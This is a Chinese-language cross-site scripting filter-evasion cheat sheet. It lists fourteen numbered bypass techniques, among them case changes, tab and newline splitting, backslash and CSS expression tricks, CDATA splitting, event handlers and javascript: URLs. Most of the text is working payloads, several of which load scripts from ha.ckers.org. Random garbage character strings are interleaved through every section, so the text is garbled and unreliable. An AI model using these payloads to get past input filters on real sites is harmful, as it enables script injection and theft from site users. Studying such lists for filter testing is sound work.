1. 改变字符大小写
- ^& L" w3 W2 f: Y
0 {- ?' E& o" Z' z
/ N- h' ?1 q2 |! M6 i! {6 w# M* j: b# O
<sCript>alert(‘d’)</scRipT>
- j5 r/ F# }+ x) r) u. y8 |9 t( T/ K: s2 c6 ^
2. 利用多加一些其它字符来规避Regular Expression的检查
. l* q, ^2 _# S8 h: [ { f6 |/ Y4 L
<<script>alert(‘c’)//<</script>
9 j4 ?! }( ^0 [8 ?3 q
3 E6 t# f' _6 R <SCRIPT a=">" SRC="t.js"></SCRIPT>
7 s- x U( I; c2 e6 y
( Y' F8 W* C% V+ \4 t0 P <SCRIPT =">" SRC="t.js"></SCRIPT>; K, U2 d+ S. [- @1 Y; a4 q5 p
1 ?& o$ L4 G& t6 a( s8 } <SCRIPT a=">" ” SRC="t.js"></SCRIPT>
' A7 \% D# L9 ~. l) X9 i& ^ _8 e- e2 k0 [3 p/ F
<SCRIPT "a=’>’" SRC="t.js"></SCRIPT># a) B2 P) u0 N
( y- k7 G- K+ d) v( P( p, A
<SCRIPT a=`>` SRC="t.js"></SCRIPT>0 E/ r( M. f, c
1 H1 J( W$ p" i { <SCRIPT a=">’>" SRC="t.js"></SCRIPT>
( V; e) I; u3 s' a4 q. ], o* ], k
% b0 f2 z$ V4 t4 Q' |3. 以其它扩展名取代.js3 n4 N. B4 H N7 ?5 W9 D. ~
! q' ?/ ~% _4 i1 s
<script src="bad.jpg"></script>! @( k7 y5 P( g+ ]4 }
1 m3 a. f/ t- |2 F2 `2 J4. 将Javascript写在CSS档里
5 \, A9 Q7 p9 C, i: H
, X' f Q% l' ~& H <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">: D) j$ U) P5 Q. h
+ ]* P% H( L* d/ F" M
example:5 Z: c6 j6 S( i M3 N
# i* f$ E" [! I1 y body {
' Y' g0 U# s2 o
% s" @. \, G! l! ~- ^1 V background-image: url(‘javascript:alert("XSS");’)
# T, ]# q6 l: @; O D+ B. P
( n" n; {, z e }
( U8 H/ O( C3 ^' R C1 x+ z$ F* Z, s& [% \1 R* C
5. 在script的tag里加入一些其它字符& z' V, ?* r% c+ M4 z. U
5 V& O. \% n/ G: \& M2 t
<SCRIPT/SRC="t.js"></SCRIPT>
+ Q/ c4 `2 o2 o: n6 R( s: c% }* p5 I- h% D
<SCRIPT/anyword SRC="t.js"></SCRIPT>8 F" k" H7 g, i% _! h) |/ }6 I/ y
3 k I6 m6 ^- ^$ E( Y
6. 使用tab或是new line来规避& w B+ _$ o* k
$ H: { G# m, M: {5 m9 a
<img src="jav ascr ipt:alert(‘XSS3′)">$ p$ ~/ @. k3 [. \' |* X
$ c; x' W3 k! S% p+ E/ u2 u' W( F <img src="jav ascr ipt:alert(‘XSS3′)">6 Z9 z. }) P+ a/ o1 U X- v8 _
# F/ B% @# U( b7 X. Z) Z <IMG SRC="jav ascript:alert(‘XSS’);">( ?& S) z( B1 S+ j4 u( N3 N
7 s1 q( x- d) [4 O- q. J
-> tag
% N; k/ _: y4 q( w; k8 F: h$ ?
( E% {3 u$ i8 N3 a -> new line
2 B4 O- b4 B# g
9 l, o9 s% c Q7. 使用"\"来规避 v5 N5 a5 C A
4 i$ N( J- X- O6 o
<STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE># ` v, m" M" ?
' {! z( H8 }) }3 V% Y+ z+ \5 I <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
3 J; s+ b+ E4 a, A- g& V$ Y2 O" C# r% p( h4 o$ O
<IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">. o6 {# b" X/ ]' U: b# V
% U7 C1 f5 x: D! l' w, f
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
" k) Q& F. q9 g/ [. w: r- U5 ~4 N. @$ q! S6 n$ C I2 R. ]
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
+ b2 y% D5 ]' { F. Y4 r$ v
) T& o4 ]( ]8 A9 n1 M# o% I8. 使用Hex encode来规避(也可能会把";"拿掉)1 u Q4 m$ h) f6 r+ }9 n1 T1 [5 ?
" @! E; S4 a6 n; J1 p
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">1 C0 \$ ]) Z5 f* M
! g- L0 ]) f; b5 ^# ]: D 原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
7 \1 M/ o' a: c6 z$ A3 g0 |6 v9 E G5 Y. o$ {* v
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">. U& h. S4 k. M' T
: d: P4 E" p, Z: k% S2 f7 L
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
4 _0 K( b/ B3 D+ e i' `4 j3 `8 A2 I: a7 q5 U8 a7 w
9. script in HTML tag
: D" q& S- j& C% r5 G; h1 e& X4 t* }% T+ b9 Q
<body onload=」alert(‘onload’)」>& O g" V- F" q( `" g& z0 X/ Z7 P
: p, ?' j W! ?7 r M onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
* }. u4 p$ `5 l+ T
# Y, q& I6 S# c) W( ]4 Y! m10. 在swf里含有xss的code3 P0 a8 s5 r2 [$ @
0 j5 g1 m) g$ X/ k
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
4 M, k/ w- N) @1 {" U. y, F
* ?% Y; @6 G" k2 m- _) w11. 利用CDATA将xss的code拆开,再组合起来。
3 \7 D$ U; u: K7 N6 ?& X, g) O$ w9 m$ u5 @
<XML ID=I><X><C># H, i( a- o8 P8 H
% i! ]$ ]% z: z& F0 y
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
7 S( f# C* L4 {( J( b: n& _! @6 W& v8 c6 U
</C></X>
' e2 J, C0 K8 V8 r# T: x
7 m4 ]( M* x, X9 D: o5 X </xml>
( P: P: H6 z# K6 P! u& L: Q$ Q; O& o/ _; A8 t1 b, o8 S$ ?- I" [
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
) Q$ [' V0 Z j: m
9 F) s& d" Y z <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>* F* ]7 \2 I, H6 Z- f8 q# q3 T
, t5 d" N: k* A6 p
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
) {0 h6 }2 ^- ]! v7 ]! M3 i) Z" }! l) _+ i, g2 V
12. 利用HTML+TIME。
b/ G% j1 F2 c6 S
Z `, l' D/ X <HTML><BODY>$ }& I' z% u/ W( c2 v7 I, q( Y' h* @
' `. Y8 V9 |- `( i% O5 A; ?9 p1 h
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">% f6 Q% I- S% J' I
' c) Q+ e1 ]. r' l8 r! R# i9 ]/ z' x
<?import namespace="t" implementation="#default#time2">
6 {5 N, h/ i; d7 C, b2 d* R. b6 f% y- \0 e& i# r9 d
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">; v( _1 R0 X/ T' `/ H
) r& F. l- s7 j4 H) [
</BODY></HTML>* N+ W V& F1 U. w. y! }0 H+ ]
4 f1 v: c; x. c1 |% n
13. 透过META写入Cookie。: Y: M6 a0 v9 S5 p9 q' n) c
, u9 S8 @, | s1 Y# g! e) o
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">) T$ ]9 M4 }1 u8 E5 F9 j% ]
" l; O' p6 _3 ?8 o$ z* x
14. javascript in src , href , url& @& {2 l- M! w: U2 s+ _* N
2 W" Q* D1 D$ h; n& k
<IFRAME SRC=javascript:alert(’13′)></IFRAME>
5 a* U6 s- _" q* U. g5 `
P1 U7 { z! K" O <img src="javascript:alert(‘XSS3′)">% t& U# j2 H6 t. `
8 a I2 L# b. X* b, e; v8 U9 H2 Y
<IMG DYNSRC="javascript:alert(‘XSS20′)">9 R1 w! g1 c% X+ _
0 y1 O2 P2 v% z c <IMG LOWSRC="javascript:alert(‘XSS21′)">
& U% A" V) {5 _, d& t f N8 g8 F& Y9 R8 V5 q
<LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
! P9 [& }" H: C4 K# v. Q# N- \3 x6 X0 d2 W% T& d
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME> H' N3 v) @0 ]; Y, j5 U' i0 i5 T+ \
& ~1 L% i3 P% i) Z <TABLE BACKGROUND="javascript:alert(‘XSS29′)">5 K' \; Z; ^3 o- ]6 p
. {( T' Q/ e' Y4 ` <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
8 P" F1 U' W( Z# o5 v2 z. H9 ?" N8 `' P: v* _/ X# f7 ?
<STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}, \) D) c' l8 E; E. _
9 _' y0 j6 X) ?4 `( |: y7 H </STYLE><A CLASS=XSS></A>% A6 J# W9 O4 J; {% Y. q+ L
/ W) c: W8 @' ]6 M
<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET> [$ u3 P0 T/ G- {: d, p. ]
& O$ B* x. M) E$ L# }
|